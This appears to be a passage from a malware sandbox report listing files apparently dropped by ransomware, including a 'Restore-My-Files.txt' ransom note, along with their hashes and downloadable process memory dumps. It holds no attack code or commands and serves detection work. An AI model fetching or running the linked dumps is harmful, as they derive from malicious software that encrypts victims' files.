                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4a843a97ae51c310b573a02ffd2a0e8e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              063fa914ccb07249123c0d5f4595935487635b20

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              727ecf287fb6f4953ee7748913dd559b4f8d3a022fa2ca55bc51cf5886c52086

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              905c081552d95b523ecf1155b6c7e157652e5ff00cda30c1c21124d266eb7d305c3398d6832316f403dc45d1b639f1a5a67aea29922cd1a032f52e5247ec55d2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\Installer\f7849fb.mst
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ea8da282bb6be04d6abc876e64bf6e18

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              edbab61bcd01623539f0b73f7bf2d5fe6d7c6500

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              9e0ac5804947fc6b09929832b93d5b33168eeb57f89f3c984f680b3637857282

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1bca5ca2767ee9dde9247667b839d2cf35024d65c401c4feb497e6222a69cb16597edc97276d27c97547f8d1b4180b75522d554d441ded4af1b6f891e718d617

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\XK\Folder.htt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              640B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5d142e7978321fde49abd9a068b64d97

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              70020fcf7f3d6dafb6c8cd7a55395196a487bef4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              fe222b08327bbfb35cbd627c0526ba7b5755b02ce0a95823a4c0bf58e601d061

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2351284652a9a1b35006baf4727a85199406e464ac33cb4701a6182e1076aaff022c227dbe4ad6e916eba15ebad08b10719a8e86d5a0f89844a163a7d4a7bbf9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\XK\Restore-My-Files.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              be7ae953aa597a78fe69ebac5190aacb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              f9ea8486d9189d095155709401833dc4bbe4cebf

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              67627b3baf8436c143c11b3ee1a916d0f8cb2f838a5ecba738f3b99c1c8a249d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              8c2fbf6443c4d6e93ac5669871100231f82024bfaaaaa2d7d3b9f3ee0ad2b2d01976b2655b95da288ea2b7ac0739d00d3b1fb5c31e7c02f355a215c70ad7d797

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\desktop.ini
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              217B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              c00d8433fe598abff197e690231531e0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4f6b87a4327ff5343e9e87275d505b9f145a7e42

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              52fb776a91b260bf196016ecb195550cdd9084058fe7b4dd3fe2d4fda1b6470e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              a71523ec2bd711e381a37baabd89517dff6c6530a435f4382b7f4056f98aff5d6014e85ce3b79bd1f02fdd6adc925cd3fc051752c1069e9eb511a465cd9908e1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • F:\$RECYCLE.BIN\S-1-5-21-3551809350-4263495960-1443967649-1000\desktop.ini
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              129B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              a526b9e7c716b3489d8cc062fbce4005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/300-134-0x0000000000410000-0x000000000041C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              48KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/448-13344-0x0000000000400000-0x00000000004A5000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              660KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/448-42451-0x0000000000400000-0x00000000004A5000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              660KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/448-12082-0x0000000000400000-0x00000000004A5000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              660KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/752-121-0x000000000F270000-0x000000000F28B000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              108KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/752-42454-0x000000000F270000-0x000000000F28B000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              108KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/1136-6851-0x0000000000400000-0x000000000045E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              376KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/1136-3706-0x0000000000400000-0x000000000045E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              376KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/1260-12043-0x0000000000400000-0x00000000004A5000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              660KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/1260-122-0x0000000000400000-0x00000000004A5000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              660KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/1788-5170-0x0000000004870000-0x0000000004914000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              656KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/1788-2910-0x00000000000E0000-0x000000000016A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              552KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/1788-6127-0x00000000002C0000-0x00000000002C6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              24KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/1788-4196-0x0000000000240000-0x0000000000246000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              24KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/1852-12069-0x0000000000400000-0x0000000000503000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • memory/1928-1511-0x0000000000400000-0x0000000000449000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              292KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Download

